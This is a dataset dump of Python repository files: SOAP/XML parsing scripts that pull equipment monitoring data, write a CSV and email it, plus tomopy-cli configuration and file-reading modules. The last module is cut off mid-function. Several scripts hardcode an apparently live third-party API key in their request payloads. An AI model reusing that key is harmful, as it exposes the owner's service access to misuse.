[ { "alpha_fraction": 0.6358225345611572, "alphanum_fraction": 0.6450216174125671, "avg_line_length": 34.693878173828125, "blob_id": "40fcdce98f8ff67653bed0836f9c35de4065f3fb", "content_id": "16001a8c053c6f5ea77cdb7e2c03e3141ca552a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 140, "num_lines": 49, "path": "/file_operation.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\r\nimport re\r\nimport time\r\ninfile = open(\"parse.xml\",\"r\")\r\ncontents = infile.read()\r\nsoup = BeautifulSoup(contents,'xml')\r\nprint soup.prettify()\r\ntitles = soup.find_all('EquipmentParameterDetailsModel')\r\ndata = soup.find_all('ParamID')\r\n\r\n#print titles\r\nfor EquipmentParameterDetailsModel in titles:\r\n x = soup.contents[0].EquipmentParameterDetailsModel\r\n # print x #this gives me data for only ParamID=670 I want to capture the same for ParamID=671\r\n # print \"\\n\"\r\n #for ParamID in data: \r\n y = soup.contents[0].EquipmentParameterDetailsModel.ParamID\r\n # print y\r\n '''\r\n name_3 = EquipmentParameterDetailsModel.contents[3]\r\n print name_3\r\n print \"\\n\"\r\n time.sleep(1)'''\r\n #print(EquipmentParameterDetailsModel.get_text())\r\n #print (soup.find_all(ParamID='671'))\r\n #print soup.EquipmentParameterDetailsModel.ParamID\r\n #print soup.EquipmentParameterDetailsModel.ParamName\r\n #print soup.EquipmentParameterDetailsModel.ParamValue\r\n #time.sleep(1)\r\n #print soup.EquipmentParameterDetailsModel.ParamID\r\n #print soup.EquipmentParameterDetailsModel.ParamName\r\n #print soup.EquipmentParameterDetailsModel.ParamValue\r\n\r\n #for EquipmentParameterDetailsModel in titles:\r\n# print(sou.equipmentparameterdetailsmodel.find)\r\n \r\n\r\n#print(sou.paramlist.findAll(name=\"paramid\"))\r\n#print (sou.equipmentparameterdetailsmodel.find(name=\"paramvalue\"))\r\n '''ID = soup.find_all('ParamID') \r\n value = soup.find_all('ParamValue')\r\n #print ID\r\n for ParamID in ID:\r\n \r\n for ParamValue in value:\r\n print (ParamID.get_text())\r\n print \"\\t\\t\"\r\n print(ParamValue.get_text())\r\n print \"\\n\\n\" '''\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n" }, { "alpha_fraction": 0.5820689797401428, "alphanum_fraction": 0.6151723861694336, "avg_line_length": 36.157894134521484, "blob_id": "09d88e783df434d3f6bfb9ddf41b9afe951eb2ab", "content_id": "d837e60a2926f7f3c7c0bea975f46d43cc5bc650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 725, "license_type": "no_license", "max_line_length": 146, "num_lines": 19, "path": "/Calender.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from datetime import *\r\nimport datetime\r\nimport time\r\n\r\nmonths = [\"Unknown\",\"January\",\"Febuary\",\"Marchh\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\"]\r\ndatetimeWrite = (time.strftime(\"%d-%m-%Y \"))\r\ndate = time.strftime(\"%d\")\r\nmonth= time.strftime(\"%m\")\r\nchoices = {'01': 'Jan', '02':'Feb','03':'Mar','04':'Apr','05':'May','06': 'Jun','07':'Jul','08':'Aug','09':'Sep','10':'Oct','11':'Nov','12':'Dec'}\r\nresult = choices.get(month, 'default')\r\nyear = time.strftime(\"%Y\")\r\nDate = date+\"-\"+result+\"-\"+year\r\nprint Date\r\n\r\nyear=datetime.date.today().strftime(\"%Y\")\r\nmonth=datetime.date.today().strftime(\"%b\")\r\nday=datetime.date.today().strftime(\"%d\")\r\nDate = day+\"-\"+month+\"-\"+year\r\nprint Date\r\n" }, { "alpha_fraction": 0.6778181791305542, "alphanum_fraction": 0.7039999961853027, "avg_line_length": 53, "blob_id": "95f44209ae2d21c90c5111b59bc5a4ea248c7253", "content_id": "b57a682a3a2b186587e40e757c85aa38eebeff8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1375, "license_type": "no_license", "max_line_length": 576, "num_lines": 25, "path": "/Sudos.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from suds.client import Client\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nurl=\"http://maven.geohems.com/mvts/AssetTrackingObjWebService.asmx?WSDL\"\r\nclient = Client(url)\r\n#print client ## shows the details of this service\r\npayload = \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\\n<soap:Envelope xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\" xmlns:soap=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\\n <soap:Body>\\n <GetEquipmentEngineMonitoringReport xmlns=\\\"http://tempuri.org/\\\">\\n <APIKey>J12CM751YTU</APIKey>\\n <EquipmentId>Govind-Paritwadi-CP2</EquipmentId>\\n <StartDate>21-Jun-2017 05:34</StartDate>\\n <EndDate>21-Jun-2017 05:35</EndDate>\\n </GetEquipmentEngineMonitoringReport>\\n </soap:Body>\\n</soap:Envelope>\\n\\n\"\r\nheaders = {\r\n 'content-type': \"text/xml; charset=utf-8\",\r\n 'soapaction': \"http://tempuri.org/GetEquipmentEngineMonitoringReport\",\r\n } \r\nresponse = requests.post(url,data=payload,headers=headers)\r\nprint response.content\r\ndata = response.content\r\n#required_dict = Client.dict(suds_object)\r\n#print required_dict\r\nfp = open(\"parse.xml\",\"w\")\r\nfp.write(data)\r\nfp.close()\r\n\r\n'''soup = BeautifulSoup(data, 'html.parser')\r\nsearchTerms= ['Time','ParamID','ParamName','Paramvalue']\r\nfor st in searchTerms:\r\n print st+'\\t'\r\n print soup.find(st.lower()).contents'''\r\n" }, { "alpha_fraction": 0.7981651425361633, "alphanum_fraction": 0.7981651425361633, "avg_line_length": 53.5, "blob_id": "96807cf3febd640119773ff213a7ecb93c22daed", "content_id": "5d65d6652e011e8e4a432ffd3d3c06e49cff908f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 109, "license_type": "no_license", "max_line_length": 87, "num_lines": 2, "path": "/README.md", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "# Nested_XML_Parsing\nParse soap XML envelop and extract that nested XML to get the particular field of data.\n" }, { "alpha_fraction": 0.5598695278167725, "alphanum_fraction": 0.5753999352455139, "avg_line_length": 37.02424240112305, "blob_id": "92952bb7177ad3a8250ea8dbbf559ebaa668557a", "content_id": "fff61201a17c0b156e91b36283dfa9169e2ec92b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6439, "license_type": "no_license", "max_line_length": 575, "num_lines": 165, "path": "/Final_parse.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from suds.client import Client #Soap client for webservices\r\nimport requests\r\nfrom lxml import etree\r\nimport datetime\r\nimport time\r\nimport csv\r\nimport os.path\r\nfrom time import strftime, gmtime, localtime\r\n\r\n############################ Liberaries for Email ################################\r\n\r\nimport smtplib\r\nimport mimetypes\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email import encoders\r\nfrom email.message import Message\r\nfrom email.mime.audio import MIMEAudio\r\nfrom email.mime.base import MIMEBase\r\nfrom email.mime.image import MIMEImage\r\nfrom email.mime.text import MIMEText\r\n\r\n############################ Date and Time #######################################\r\n\r\nyear = datetime.date.today().strftime(\"%Y\")\r\nmonth = datetime.date.today().strftime(\"%b\")\r\nday = datetime.date.today().strftime(\"%d\") \r\nDate = day+\"-\"+month+\"-\"+year\r\nTime = \"10:20\"#(time.strftime(\"%H:%M\"))#\"09:30\"\r\n#print Time\r\n\r\n#time_hour = time.strftime(\"%H\")\r\n#time_min = time.strftime(\"%M\") \r\n#time_one = int(time_min)-2\r\n#STime = \"10.15\"#time_hour+\":\"+ str(time_one)\r\n#print STime\r\n#start_time = datetime.datetime.now()-datetime.timedelta(minutes=1)\r\n#print start_time\r\n\r\n############################# IST to GMT conversion ##############################\r\n\r\nutc_Time = strftime('%H:%M', gmtime()) #UTC time\r\nprint utc_Time\r\nutc_hr = strftime('%H',gmtime())\r\nutc_min = strftime('%M',gmtime())\r\n#print utc_min\r\nlag_time = int(utc_min)-02\r\nlag_one = str(lag_time)\r\nlength = len(lag_one)\r\nif length < 2:\r\n le = '0'+lag_one\r\n var1 = utc_hr+\":\"+str(le)\r\n print var1\r\nelse:\r\n print lag_time\r\n var1 = utc_hr+\":\"+str(lag_time)\r\n print var1\r\n\r\n\r\n############################ Email variables ######################################\r\n\r\nemailfrom = \"[email protected]\" #Senders email addr\r\nemailto = \"[email protected]\" #Receivers email addr\r\nfileToSend = Date+\".csv\" #26-Jun-2017.csv\"\r\nusername = \"**********************\"\r\npassword = \"*******************\"\r\n\r\n############################ Calling URL for getting soap response ################\r\n\r\ncentre_name = ['Amul-Khadawali','Amul -Talvali','Amul-Kude','Amul-Lalthane','Amul-Musarne','Amul-Malwada','Amul Pedpargaon']\r\n #'Cavinkare',\r\n #'Device--0019',\r\n #'Govind-Paritwadi-CP1','Govind- Paritwadi-CP2',\r\n #'Mobile chiller','Mother Dairy Test',\r\n #'Nestle-Punjab',\r\n #'Promethean Lab']\r\nurl = \"http://rms.geohems.com/AssetTrackingObjWebService.asmx?WSDL\"\r\nclient = Client(url)\r\n\r\nfor i in centre_name:\r\n payload = \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\\n<soap:Envelope xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\" xmlns:soap=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\">\\n <soap:Body>\\n <GetEquipmentEngineMonitoringReport xmlns=\\\"http://tempuri.org/\\\">\\n <APIKey>J12CM751YTU</APIKey>\\n <EquipmentId>\"+i+\"</EquipmentId>\\n <StartDate>\"+Date+\" \"+var1+\"</StartDate>\\n <EndDate>\"+Date+\" \"+utc_Time+\"</EndDate>\\n </GetEquipmentEngineMonitoringReport>\\n </soap:Body>\\n</soap:Envelope>\\n\\n\"\r\n print payload\r\n headers = {\r\n 'content-type': \"text/xml; charset=utf-8\",\r\n 'soapaction': \"http://tempuri.org/GetEquipmentEngineMonitoringReport\",\r\n } \r\n response = requests.post(url,data=payload,headers=headers)\r\n\r\n data = response.content\r\n #print data\r\n fp = open(\"parse.xml\",\"w\")\r\n fp.write(data)\r\n fp.close()\r\n\r\n tree = etree.XML(data)\r\n #print len(data)\r\n ns = {'default': 'http://tempuri.org/'}\r\n\r\n centers = tree.xpath('//default:EquipmentId/text()', namespaces=ns)\r\n times = tree.xpath('//default:Time/text()', namespaces=ns)\r\n #ids = tree.xpath('//default:ParamID/text()', namespaces=ns)\r\n names = tree.xpath('//default:ParamName/text()', namespaces=ns)\r\n values = tree.xpath('//default:ParamValue/text()', namespaces=ns)\r\n\r\n print(centers)\r\n print(times[0]) +\"\\t\"+(names[0])+\"\\t\"+(values[0])\r\n print(times[54]) +\"\\t\"+(names[0])+\"\\t\"+(values[54])\r\n #print(times[108])+\"\\t\"+(names[0])+\"\\t\"+(values[108])\r\n print(times[0]) +\"\\t\"+(names[1])+\"\\t\"+(values[1])\r\n print(times[54]) +\"\\t\"+(names[1])+\"\\t\"+(values[54])\r\n #print(times[108])+\"\\t\"+(names[1])+\"\\t\"+(values[108])\r\n\r\n#################################### Writing in .csv file ######################################### \r\n\r\n file_exists = os.path.isfile(\"C:/Python27/\"+Date+\".csv\")\r\n with open(Date+'.csv','a')as csvfile:\r\n headers = ['center','Time','Name','Value']\r\n writer = csv.DictWriter(csvfile, delimiter=',', lineterminator='\\n',fieldnames=headers)\r\n #writer = csv.DictWriter(csvfile,fieldnames=fieldnames)\r\n if not file_exists:\r\n writer.writeheader()\r\n \r\n writer.writerow({'center':centers[0],'Time':times[0],'Name':names[0],'Value':values[0]})\r\n writer.writerow({'center':centers[0],'Time':times[0],'Name':names[1],'Value':values[1]})\r\n\r\n#################################### code for sending Email #######################################\r\n \r\nmsg = MIMEMultipart()\r\nmsg[\"From\"] = emailfrom\r\nmsg[\"To\"] = emailto\r\nmsg[\"Subject\"] = \"Promethean logger info\"\r\nmsg.preamble = \"Promethean logger info\"\r\n\r\nctype, encoding = mimetypes.guess_type(fileToSend)\r\nif ctype is None or encoding is not None:\r\n ctype = \"application/octet-stream\"\r\n\r\nmaintype, subtype = ctype.split(\"/\", 1)\r\n\r\nif maintype == \"text\":\r\n fp = open(fileToSend)\r\n # Note: we should handle calculating the charset\r\n attachment = MIMEText(fp.read(), _subtype=subtype)\r\n fp.close()\r\nelif maintype == \"image\":\r\n fp = open(fileToSend, \"rb\")\r\n attachment = MIMEImage(fp.read(), _subtype=subtype)\r\n fp.close()\r\nelif maintype == \"audio\":\r\n fp = open(fileToSend, \"rb\")\r\n attachment = MIMEAudio(fp.read(), _subtype=subtype)\r\n fp.close()\r\nelse:\r\n fp = open(fileToSend, \"rb\")\r\n attachment = MIMEBase(maintype, subtype)\r\n attachment.set_payload(fp.read())\r\n fp.close()\r\n encoders.encode_base64(attachment)\r\nattachment.add_header(\"Content-Disposition\", \"attachment\", filename=fileToSend)\r\nmsg.attach(attachment)\r\n\r\nserver = smtplib.SMTP(\"smtp.gmail.com:587\")\r\nserver.starttls()\r\nserver.login(username,password)\r\nserver.sendmail(emailfrom, emailto, msg.as_string())\r\nserver.quit()\r\n" }, { "alpha_fraction": 0.5580110549926758, "alphanum_fraction": 0.6174033284187317, "avg_line_length": 26.959999084472656, "blob_id": "1bac673fe90f23329fdc7267dc0605f1fb39388e", "content_id": "b16c3bc76cbc276a8fffc2d8f60883da9ff93116", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 724, "license_type": "no_license", "max_line_length": 70, "num_lines": 25, "path": "/TimeZone.py", "repo_name": "tanmayee30/XML_Prasing", "src_encoding": "UTF-8", "text": "from time import strftime, gmtime, localtime\r\n\r\n#def aslocaltimestr(utc_dt):\r\n# return utc_to_local(utc_dt).strftime('%Y-%m-%d %H:%M:%S.%f %Z%z')\r\n\r\n#print(aslocaltimestr(datetime(2010, 6, 6, 17, 29, 7, 730000)))\r\n#print(aslocaltimestr(datetime(2010, 12, 6, 17, 29, 7, 730000)))\r\n#print(aslocaltimestr(datetime.utcnow()))\r\n\r\nutc_Time = strftime('%H:%M', gmtime()) #UTC time\r\nprint utc_Time\r\nutc_hr = strftime('%H',gmtime())\r\nutc_min = strftime('%M',gmtime())\r\n#print utc_min\r\nlag_time = int(utc_min)-01\r\nlag_one = str(lag_time)\r\nlength = len(lag_one)\r\nif length < 2:\r\n le = '0'+lag_one\r\n var1 = utc_hr +\":\"+str(le)\r\n print var1\r\nelse:\r\n print lag_time\r\n var1 = (utc_hr)+\":\"+str(lag_time)\r\n print var1\r\n" } ]
6
data-exchange/tomopy-cli-last-before-tomography
https://github.com/data-exchange/tomopy-cli-last-before-tomography
a9f6fe354a17d183a98d9c3b731e956d40e0cac2
6fd87b4c3023364bfe506446eac0d5c540cc5c53
c0a4485f1c6edf46b4f42b1e3c3bd1c2d0b66098
refs/heads/master
2020-12-10T04:13:10.596848
2020-01-12T20:58:42
2020-01-12T20:58:42
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5493765473365784, "alphanum_fraction": 0.5572595596313477, "avg_line_length": 33.27027130126953, "blob_id": "c1d16902fc591582253dbfd8c01b29752f5105cf", "content_id": "669a13c196ecbe1994cf1d5046b9030bffd3a6d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13956, "license_type": "no_license", "max_line_length": 182, "num_lines": 407, "path": "/tomopy_cli/config.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport pathlib\nimport argparse\nimport configparser\n\nfrom collections import OrderedDict\n\nfrom tomopy_cli import log\nfrom tomopy_cli import util\n\nLOGS_HOME = os.path.join(str(pathlib.Path.home()), 'logs')\nCONFIG_FILE_NAME = os.path.join(str(pathlib.Path.home()), 'tomopy.conf')\nROTATION_AXIS_FILE_NAME = \"rotation_axis.json\"\n\nSECTIONS = OrderedDict()\n\n\nSECTIONS['general'] = {\n 'config': {\n 'default': CONFIG_FILE_NAME,\n 'type': str,\n 'help': \"File name of configuration file\",\n 'metavar': 'FILE'},\n 'logs-home': {\n 'default': LOGS_HOME,\n 'type': str,\n 'help': \"Log file directory\",\n 'metavar': 'FILE'},\n 'rotation-axis-file': {\n 'default': ROTATION_AXIS_FILE_NAME,\n 'type': str,\n 'help': \"File name of rataion axis locations\",\n 'metavar': 'FILE'},\n 'verbose': {\n 'default': False,\n 'help': 'Verbose output',\n 'action': 'store_true'}\n }\n\nSECTIONS['find-rotation-axis'] = {\n 'center-search-width': {\n 'type': float,\n 'default': 10.0,\n 'help': \"+/- center search width (pixel). Search is in 0.5 pixel increments\"},\n }\n\nSECTIONS['file-reading'] = {\n 'hdf-file': {\n 'default': '.',\n 'type': str,\n 'help': \"Name of the last used hdf file or directory containing multiple hdf files\",\n 'metavar': 'PATH'},\n 'hdf-file-type': {\n 'default': 'standard',\n 'type': str,\n 'help': \"Input file type\",\n 'choices': ['standard', 'flip_and_stich', 'mosaic']},\n 'nsino': {\n 'default': 0.5,\n 'type': float,\n 'help': 'Location of the sinogram used for slice reconstruction and find axis (0 top, 1 bottom)'},\n 'nsino-per-chunk': { \n 'type': util.positive_int,\n 'default': 32,\n 'help': \"Number of sinagram per chunk. Use larger numbers with computers with larger memory\",\n 'choices': [2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048]},\n 'binning': {\n 'type': util.positive_int,\n 'default': 0,\n 'help': \"Reconstruction binning factor as power(2, choice)\",\n 'choices': [0, 1, 2, 3]},\n 'rotation-axis': {\n 'default': -1.0,\n 'type': float,\n 'help': \"Location of rotation axis\"},\n 'rotation-axis-flip': {\n 'default': -1.0,\n 'type': float,\n 'help': \"Location of rotation axis in a 0-360 flip and stich data collection\"},\n 'reverse': {\n 'default': False,\n 'help': 'When set, the data set was collected in reverse (180-0)',\n 'action': 'store_true'},\n 'blocked-views': {\n 'default': False,\n 'help': 'When set, the missing-angles options are used',\n 'action': 'store_true'},\n 'dark-zero': {\n 'default': False,\n 'help': 'When set, the the dark field is set to zero',\n 'action': 'store_true'} \n }\n\nSECTIONS['missing-angles'] = {\n 'missing-angles-start': {\n 'type': util.positive_int,\n 'default': 0,\n 'help': \"Projection number of the first blocked view\"},\n 'missing-angles-end': {\n 'type': util.positive_int,\n 'default': 1,\n 'help': \"Projection number of the first blocked view\"},\n }\n\nSECTIONS['zinger-removal'] = {\n 'zinger-removal-method': {\n 'default': 'none',\n 'type': str,\n 'help': \"Zinger removal correction method\",\n 'choices': ['none', 'standard']},\n 'zinger-level-projections': {\n 'default': 800.0,\n 'type': float,\n 'help': 'Expected difference value between outlier value and the median value of the array'},\n 'zinger-level-white': {\n 'default': 1000.0,\n 'type': float,\n 'help': 'Expected difference value between outlier value and the median value of the array'},\n 'zinger-size': {\n 'type': util.positive_int,\n 'default': 3,\n 'help': \"Size of the median filter\"},\n }\n\nSECTIONS['flat-correction'] = {\n 'flat-correction-method': {\n 'default': 'standard',\n 'type': str,\n 'help': \"Flat correction method\",\n 'choices': ['standard', 'air', 'none']},\n 'normalization-cutoff': {\n 'default': 1.0,\n 'type': float,\n 'help': 'Permitted maximum vaue for the normalized data'},\n 'air': {\n 'type': util.positive_int,\n 'default': 10,\n 'help': \"Number of pixels at each boundary to calculate the scaling factor\"},\n 'fix-nan-and-inf': {\n 'default': False,\n 'help': \"Fix nan and inf\",\n 'action': 'store_true'},\n 'fix-nan-and-inf-value': {\n 'default': 0.0,\n 'type': float,\n 'help': \"Values to be replaced with negative values in array\"},\n 'minus-log': {\n 'default': False,\n 'help': \"Minus log\",\n 'action': 'store_true'},\n }\n\nSECTIONS['retrieve-phase'] = {\n 'retrieve-phase-method': {\n 'default': 'none',\n 'type': str,\n 'help': \"Phase retrieval correction method\",\n 'choices': ['none', 'paganin']},\n 'energy': {\n 'default': 20,\n 'type': float,\n 'help': \"X-ray energy [keV]\"},\n 'propagation-distance': {\n 'default': 60,\n 'type': float,\n 'help': \"Sample detector distance [mm]\"},\n 'pixel-size': {\n 'default': 1.17,\n 'type': float,\n 'help': \"Pixel size [microns]\"},\n 'retrieve-phase-alpha': {\n 'default': 0.001,\n 'type': float,\n 'help': \"Regularization parameter\"},\n 'retrieve-phase-alpha-try': {\n 'default': False,\n 'help': \"When set, multiple reconstruction of the same slice with different alpha coefficient are generated\",\n 'action': 'store_true'},\n }\n\nSECTIONS['remove-stripe'] = {\n 'remove-stripe-method': {\n 'default': 'none',\n 'type': str,\n 'help': \"Remove stripe method: none, fourier-wavelet, titarenko, smoothing filter\",\n 'choices': ['none', 'fw', 'ti', 'sf']},\n }\n\nSECTIONS['fw'] = {\n 'fw-sigma': {\n 'default': 1,\n 'type': float,\n 'help': \"Fourier-Wavelet remove stripe damping parameter\"},\n 'fw-filter': {\n 'default': 'sym16',\n 'type': str,\n 'help': \"Fourier-Wavelet remove stripe filter\",\n 'choices': ['haar', 'db5', 'sym5', 'sym16']},\n 'fw-level': {\n 'type': util.positive_int,\n 'default': 7,\n 'help': \"Fourier-Wavelet remove stripe level parameter\"},\n 'fw-pad': {\n 'default': False,\n 'help': \"When set, Fourier-Wavelet remove stripe extend the size of the sinogram by padding with zeros\",\n 'action': 'store_true'},\n }\n\nSECTIONS['ti'] = {\n 'ti-alpha': {\n 'default': 1.5,\n 'type': float,\n 'help': \"Titarenko remove stripe damping factor\"},\n 'ti-nblock': {\n 'default': 0,\n 'type': util.positive_int,\n 'help': \"Titarenko remove stripe number of blocks\"},\n }\n\nSECTIONS['sf'] = {\n 'sf-size': {\n 'default': 5,\n 'type': util.positive_int,\n 'help': \"Smoothing filter remove stripe size\"}\n }\n\nSECTIONS['reconstruction'] = {\n 'filter': {\n 'default': 'parzen',\n 'type': str,\n 'help': \"Reconstruction filter\",\n 'choices': ['none', 'shepp', 'cosine', 'hann', 'hamming', 'ramlak', 'parzen', 'butterworth']},\n 'reconstruction-type': {\n 'default': 'try',\n 'type': str,\n 'help': \"Reconstruct slice or full data set. For option (try): multiple reconstruction of the same slice with different (rotation axis) are generated\",\n 'choices': ['try', 'slice', 'full']},\n 'reconstruction-algorithm': {\n 'default': 'gridrec',\n 'type': str,\n 'help': \"Reconstruction algorithm\",\n 'choices': ['art', 'astrasirt', 'astracgls', 'bart', 'fpb', 'gridrec', 'mlem', 'osem', 'ospml_hybrid', 'ospml_quad', 'pml_hybrid', 'pml_quad', 'sirt', 'tv', 'grad', 'tikh']},\n 'reconstruction-mask': {\n 'default': False,\n 'help': \"When set, applies circular mask to the reconstructed slices\",\n 'action': 'store_true'},\n 'reconstruction-mask-ratio': {\n 'default': 1.0,\n 'type': float,\n 'help': \"Ratio of the mask’s diameter in pixels to the smallest edge size along given axis\"},\n 'padding': {\n 'default': False,\n 'help': \"When set, raw data are padded/unpadded before/after reconstruction\",\n 'action': 'store_true'},\n }\n\nSECTIONS['iterative'] = {\n 'iteration-count': {\n 'default': 10,\n 'type': util.positive_int,\n 'help': \"Maximum number of iterations\"},\n }\n\nRECON_PARAMS = ('find-rotation-axis', 'file-reading', 'missing-angles', 'zinger-removal', 'flat-correction', 'remove-stripe', 'fw', \n 'ti', 'sf', 'retrieve-phase', 'reconstruction', 'iterative')\nFIND_CENTER_PARAMS = ('file-reading', 'find-rotation-axis')\n\n# PREPROC_PARAMS = ('flat-correction', 'remove-stripe', 'retrieve-phase')\n\nNICE_NAMES = ('General', 'Find rotation axis', 'File reading', 'Missing angles', 'Zinger removal', 'Flat correction', 'Retrieve phase', \n 'Remove stripe','Fourier wavelet', 'Titarenko', 'Smoothing filter', 'Reconstruction', 'Iterative')\n\ndef get_config_name():\n \"\"\"Get the command line --config option.\"\"\"\n name = CONFIG_FILE_NAME\n for i, arg in enumerate(sys.argv):\n if arg.startswith('--config'):\n if arg == '--config':\n return sys.argv[i + 1]\n else:\n name = sys.argv[i].split('--config')[1]\n if name[0] == '=':\n name = name[1:]\n return name\n\n return name\n\n\ndef parse_known_args(parser, subparser=False):\n \"\"\"\n Parse arguments from file and then override by the ones specified on the\n command line. Use *parser* for parsing and is *subparser* is True take into\n account that there is a value on the command line specifying the subparser.\n \"\"\"\n if len(sys.argv) > 1:\n subparser_value = [sys.argv[1]] if subparser else []\n config_values = config_to_list(config_name=get_config_name())\n values = subparser_value + config_values + sys.argv[1:]\n #print(subparser_value, config_values, values)\n else:\n values = \"\"\n\n return parser.parse_known_args(values)[0]\n\n\ndef config_to_list(config_name=CONFIG_FILE_NAME):\n \"\"\"\n Read arguments from config file and convert them to a list of keys and\n values as sys.argv does when they are specified on the command line.\n *config_name* is the file name of the config file.\n \"\"\"\n result = []\n config = configparser.ConfigParser()\n\n if not config.read([config_name]):\n return []\n\n for section in SECTIONS:\n for name, opts in ((n, o) for n, o in SECTIONS[section].items() if config.has_option(section, n)):\n value = config.get(section, name)\n\n if value is not '' and value != 'None':\n action = opts.get('action', None)\n\n if action == 'store_true' and value == 'True':\n # Only the key is on the command line for this action\n result.append('--{}'.format(name))\n\n if not action == 'store_true':\n if opts.get('nargs', None) == '+':\n result.append('--{}'.format(name))\n result.extend((v.strip() for v in value.split(',')))\n else:\n result.append('--{}={}'.format(name, value))\n\n return result\n\n\nclass Params(object):\n def __init__(self, sections=()):\n self.sections = sections + ('general', )\n\n def add_parser_args(self, parser):\n for section in self.sections:\n for name in sorted(SECTIONS[section]):\n opts = SECTIONS[section][name]\n parser.add_argument('--{}'.format(name), **opts)\n\n def add_arguments(self, parser):\n self.add_parser_args(parser)\n return parser\n\n def get_defaults(self):\n parser = argparse.ArgumentParser()\n self.add_arguments(parser)\n\n return parser.parse_args('')\n\n\ndef write(config_file, args=None, sections=None):\n \"\"\"\n Write *config_file* with values from *args* if they are specified,\n otherwise use the defaults. If *sections* are specified, write values from\n *args* only to those sections, use the defaults on the remaining ones.\n \"\"\"\n config = configparser.ConfigParser()\n for section in SECTIONS:\n config.add_section(section)\n for name, opts in SECTIONS[section].items():\n if args and sections and section in sections and hasattr(args, name.replace('-', '_')):\n value = getattr(args, name.replace('-', '_'))\n if isinstance(value, list):\n # print(type(value), value)\n value = ', '.join(value)\n else:\n value = opts['default'] if opts['default'] is not None else ''\n\n prefix = '# ' if value is '' else ''\n\n if name != 'config':\n config.set(section, prefix + name, str(value))\n with open(config_file, 'w') as f:\n config.write(f)\n\n\ndef log_values(args):\n \"\"\"Log all values set in the args namespace.\n\n Arguments are grouped according to their section and logged alphabetically\n using the DEBUG log level thus --verbose is required.\n \"\"\"\n args = args.__dict__\n\n log.warning('tomopy-cli status start')\n for section, name in zip(SECTIONS, NICE_NAMES):\n entries = sorted((k for k in args.keys() if k.replace('_', '-') in SECTIONS[section]))\n\n # print('log_values', section, name, entries)\n if entries:\n log.info(name)\n\n for entry in entries:\n value = args[entry] if args[entry] is not None else \"-\"\n log.info(\" {:<16} {}\".format(entry, value))\n\n log.warning('tomopy-cli status end')\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5776085257530212, "alphanum_fraction": 0.6150356531143188, "avg_line_length": 32.726776123046875, "blob_id": "96b1bafe7d375572b00e833d041a59797a935f03", "content_id": "cf2fe0ab7e6e727b0b42797c57ef5a66c82890ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6172, "license_type": "no_license", "max_line_length": 107, "num_lines": 183, "path": "/tomopy_cli/file_io.py", "repo_name": "data-exchange/tomopy-cli-last-before-tomography", "src_encoding": "UTF-8", "text": "import os\nimport h5py\nimport json\nimport collections\nimport tomopy\nimport dxchange\nimport dxchange.reader as dxreader\nimport numpy as np\n\nfrom tomopy_cli import log\nfrom tomopy_cli import proc\n\n \ndef read_tomo(sino, params):\n\n if params.hdf_file_type == 'standard':\n # Read APS 32-BM raw data.\n log.info(\" *** loading a stardard data set: %s\" % params.hdf_file)\n proj, flat, dark, theta = dxchange.read_aps_32id(params.hdf_file, sino=sino)\n elif params.hdf_file_type == 'flip_and_stich':\n log.info(\" *** loading a 360 deg flipped data set: %s\" % params.hdf_file)\n proj360, flat360, dark360, theta360 = dxchange.read_aps_32id(params.hdf_file, sino=sino)\n proj, flat, dark = flip_and_stitch(variableDict, proj360, flat360, dark360)\n theta = theta360[:len(theta360)//2] # take first half\n else: # params.hdf_file_type == 'mosaic':\n log.error(\" *** loading a mosaic data set is not supported yet\")\n exit()\n\n if params.reverse:\n log.info(\" *** correcting for 180-0 data collection\")\n step_size = (theta[1] - theta[0]) \n theta_size = dxreader.read_dx_dims(params.hdf_file, 'data')[0]\n theta = np.linspace(np.pi , (0+step_size), theta_size) \n\n if params.blocked_views:\n log.info(\" *** correcting for blocked view data collection\")\n miss_angles = [params.missing_angles_start, params.missing_angle_end]\n \n # Manage the missing angles:\n proj = np.concatenate((proj[0:miss_angles[0],:,:], proj[miss_angles[1]+1:-1,:,:]), axis=0)\n theta = np.concatenate((theta[0:miss_angles[0]], theta[miss_angles[1]+1:-1]))\n \n # new missing projection handling\n # if params.blocked_views:\n # log.warning(\" *** new missing angle handling\")\n # miss_angles = [params.missing_angles_start, params.missing_angle_end]\n # data = patch_projection(data, miss_angles)\n\n proj, flat, dark = binning(proj, flat, dark, params)\n\n rotation_axis = params.rotation_axis / np.power(2, float(params.binning))\n log.info(\" *** rotation center: %f\" % rotation_axis)\n\n return proj, flat, dark, theta, 